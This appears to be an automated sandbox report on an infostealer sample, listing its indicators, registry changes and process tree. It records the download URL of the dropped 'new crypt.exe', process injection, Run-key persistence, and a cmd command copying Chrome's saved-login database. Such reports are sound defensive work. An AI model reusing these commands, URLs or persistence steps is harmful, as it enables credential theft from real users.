Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10 -
submitted
07-07-2020 00:47
Static task
static1
General
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Executes dropped EXE 2 IoCs
Processes:
new crypt.exenew crypt.exepid process 1908 new crypt.exe 2964 new crypt.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
netsh.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VZ1PDXIXBT = "C:\\Program Files (x86)\\Gsfm\\rxj8ux7p.exe" netsh.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run netsh.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 3588 iexplore.exe 3588 iexplore.exe 3856 IEXPLORE.EXE 3856 IEXPLORE.EXE -
Suspicious use of SetThreadContext 5 IoCs
Processes:
new crypt.exenew crypt.exenetsh.exedescription pid process target process PID 1908 set thread context of 2964 1908 new crypt.exe new crypt.exe PID 2964 set thread context of 2972 2964 new crypt.exe Explorer.EXE PID 3992 set thread context of 2972 3992 netsh.exe Explorer.EXE PID 3992 set thread context of 3588 3992 netsh.exe iexplore.exe PID 3992 set thread context of 3856 3992 netsh.exe IEXPLORE.EXE -
Checks whether UAC is enabled 2 IoCs
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
new crypt.exenew crypt.exenetsh.exepid process 1908 new crypt.exe 2964 new crypt.exe 2964 new crypt.exe 2964 new crypt.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
new crypt.exenetsh.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2964 new crypt.exe Token: SeDebugPrivilege 3992 netsh.exe Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE Token: SeShutdownPrivilege 2972 Explorer.EXE Token: SeCreatePagefilePrivilege 2972 Explorer.EXE -
Processes:
iexplore.exeIEXPLORE.EXEnetsh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{666B61CB-BFEB-11EA-95F0-DE0A8CB91CF0} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "989011012" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000a6df6fc8e303c8fefb22a63d5ad83454541406512903cae74342ded9b8d14fea000000000e800000000200002000000097eec608e21404cb85a97c155af96b9ab9e58232c56ef4b52af9e134861445e2200000006a092b25624db4715954e9cf381a82abf67ad55869e060b01b173710e27578df4000000053facba6677d71b4c0c07961b5648731dc598ee5e3c4ed53335991d90f4facbc4c1a96b31cf49c02ec95079614b0f617e418ab9696844bfec6f1f890589dcf13 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{8CA29347-EEF8-4F9B-AE48-E646B5804345}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30823416" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \Registry\User\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 netsh.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30823416" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "300847811" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = b4679a610d44d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30823416" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "996043043" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "300864405" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90138e3bf853d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000006e609b6b4e1372711d0e622390cdd4bd30d744528d131bd0801bff965a75cd59000000000e8000000002000020000000ce8041068fb73545d26110edb063c75d612c4ec99c6ad255aa7e962e13cbf64420000000eeb92143b683686c73a6849e8355d431e1ffefc0a9fc61b107a1023bac0208ef400000001248be0dc652148d5200bea2cb1fcf86e344a52f9bc1f6460efd3304409be4bf18d28f800a85bf6e779706984f2f97592d64f781deb731d09ad409ae4a9d50cc iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "300896397" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "989011012" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9031893bf853d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe -
Drops file in Program Files directory 1 IoCs
Processes:
netsh.exedescription ioc process File opened for modification C:\Program Files (x86)\Gsfm\rxj8ux7p.exe netsh.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
iexplore.exenew crypt.exeExplorer.EXEnetsh.exedescription pid process target process PID 3588 wrote to memory of 3856 3588 iexplore.exe IEXPLORE.EXE PID 3588 wrote to memory of 3856 3588 iexplore.exe IEXPLORE.EXE PID 3588 wrote to memory of 3856 3588 iexplore.exe IEXPLORE.EXE PID 3588 wrote to memory of 1908 3588 iexplore.exe new crypt.exe PID 3588 wrote to memory of 1908 3588 iexplore.exe new crypt.exe PID 3588 wrote to memory of 1908 3588 iexplore.exe new crypt.exe PID 1908 wrote to memory of 2964 1908 new crypt.exe new crypt.exe PID 1908 wrote to memory of 2964 1908 new crypt.exe new crypt.exe PID 1908 wrote to memory of 2964 1908 new crypt.exe new crypt.exe PID 2972 wrote to memory of 3992 2972 Explorer.EXE netsh.exe PID 2972 wrote to memory of 3992 2972 Explorer.EXE netsh.exe PID 2972 wrote to memory of 3992 2972 Explorer.EXE netsh.exe PID 3992 wrote to memory of 2644 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 2644 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 2644 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 2184 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 2184 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 2184 3992 netsh.exe cmd.exe PID 3992 wrote to memory of 740 3992 netsh.exe Firefox.exe PID 3992 wrote to memory of 740 3992 netsh.exe Firefox.exe PID 3992 wrote to memory of 740 3992 netsh.exe Firefox.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 3588 iexplore.exe 3588 iexplore.exe 3588 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
Processes:
new crypt.exenew crypt.exenetsh.exepid process 1908 new crypt.exe 1908 new crypt.exe 2964 new crypt.exe 2964 new crypt.exe 2964 new crypt.exe 2964 new crypt.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe 3992 netsh.exe -
Modifies system certificate store 8 IoCs
Processes:
iexplore.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE73ACF0A4930C0F99B92F01\Blob = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal\Certificates\5FF1348C80820F2A988D0C0C7ABEA0EA394B5E6C iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal\Certificates\5FF1348C80820F2A988D0C0C7ABEA0EA394B5E6C\Blob = 0300000001000000140000005ff1348c80820f2a988d0c0c7abea0ea394b5e6c040000000100000010000000fd42404f68fae3f0d490e8d19d08ab1d0f00000001000000200000005546bb2210de2560292e6f4610af4ffbdb453f9bf9983e62942c35959e16038d140000000100000014000000b3b30880146b0eb235e8e136e7d15c9c4847f5f3190000000100000010000000e142e209d34bfb2eac257eb76a2b61e15c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000e5050000308205e1308203c9a0030201020213330000016fd585f24b93e88a0700000000016f300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3139313231323030303333315a170d3231303331323030303333315a3081a3310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3121301f06092a864886f70d010901161271666265406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100cfb24782c35c66c63688c01ed857df9a4330b81628c86831de4d577f8cb2155b880ee41953a18ac28de644bacfa97558ec6f522490f103b7fa0092430f8e0ba55c36dd91f6f1f91baec6eb3581d89133141e1580e02ec2445e5380b178f92f81e97193be8be1223d36e5f2be070a3db6ac17987ea3b42d15994c73a10e64794da4660a5d875e179c567bb06ecfd7cbf4c1ee4fe453284e72877d746a3e178788a1bd540ba9250a931a11105bb98f1b2b757fa6c5ade16e7cc1d1628fedb716018526f5b56630b54cd5f75f938e9b4a956609cc441aac84a10a101f6429b6fceb9434a41b24f0ca9781bf72b010f14bd13dc5d996b6ed6c4d53156969dd04f7390203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414b3b30880146b0eb235e8e136e7d15c9c4847f5f3301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b0500038202010064d81278e224099c122690412271d5f2d92ae1c00f7135d64f63663ccc0588826bf24cc6cffa0d6666b7e3f989825dd1021fd1bdc6a9d4a492c0f46198534382204d8668b0f3c8d85f9f614f7fff47e391a4fdc89dba1b423f1d2a8d4986ff42bac032a21224b246b03ffef26e7da49d3ef381ff9d669cda0234445bff395be1b70627f013ccde692280d75d690b4f4c5e3a123b379bd30bdc6cf1af0c69d97eb0aa4f580eb4e876465b2c62514a612a3971f6bc6ace33f569e0cbcbd5498caf2af949952c310221a382d0a7fbc4594b0bfe96a1c81d26639b249beea28179ead8377bf70e9a09596997af2b405c5425a1e5e6e46b065016901b7cd120e2389d47924b1f834955135461f7592c9487e3910bf0de382ad5906dd8c46b321b176698caaec19d1ee10aa6679981d8f2f5c40d69240a7075ce4341305d2bbd082e03c81c41baeb557b41904482ae88d0566f339ab517ae2f84223d567f9ec734c1c5a2be39aa24c49930b6428bbe2fa300f2369e1c8cc554c14010f1ee518afa32e4bf0a15cb251d37791338f5ade8ced4b67ca5fc56320c2c2973f9b13e250dabe4a373580becf787afd552c6b293dfc7bfb1f67739c64df74ae3d373e2db9c27090fe15e58591824e4f150602af628917a6d1353919cd0a8489596f97070833a98b34c2d3a0ebafda2f81096533b773c5914d7f05e66cb17af2bcd11ad517440b5 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal\Certificates iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal\CRLs iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\MSIEHistoryJournal\CTLs iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE73ACF0A4930C0F99B92F01 iexplore.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.kyrosmaritime.com/wp-admin/new%20crypt.exe2⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Modifies system certificate store
PID:3588 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3588 CREDAT:82945 /prefetch:23⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:3856 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:1908 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2964 -
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:3980
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:1864
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:3984
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:3436
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:2828
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:736
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe"2⤵
- Adds Run entry to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Modifies Internet Explorer settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:3992 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P0JNR0O6\new crypt.exe"3⤵PID:2644
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:2184
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:740